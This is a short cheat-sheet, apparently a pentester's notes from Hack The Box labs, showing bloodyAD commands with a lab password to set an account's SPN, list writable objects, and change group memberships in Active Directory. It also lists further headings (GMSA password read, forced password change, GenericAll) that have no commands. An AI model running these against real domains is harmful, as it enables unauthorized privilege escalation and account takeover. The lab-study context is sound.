BloodyAD
for WriteSPN
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updatedTo get the writable object
bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable --detail
OR
bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable
OR
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'Mirage-Service$' -k get writable to add/remove to the group
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure
└─$ bloodyAD -d $DOMAIN --host $TARGET --dc-ip $IP -u #USER -p $PASS remove groupMember "Protected Objects" "IT"[-] IT removed from Protected Objectsto read GMSA Managed Password
ForceChangePassword
Change the owner
Give GenericAll rights to the user
To check if the user account(UAC) is disabled or not
to remove the UAC
set SPN
Last updated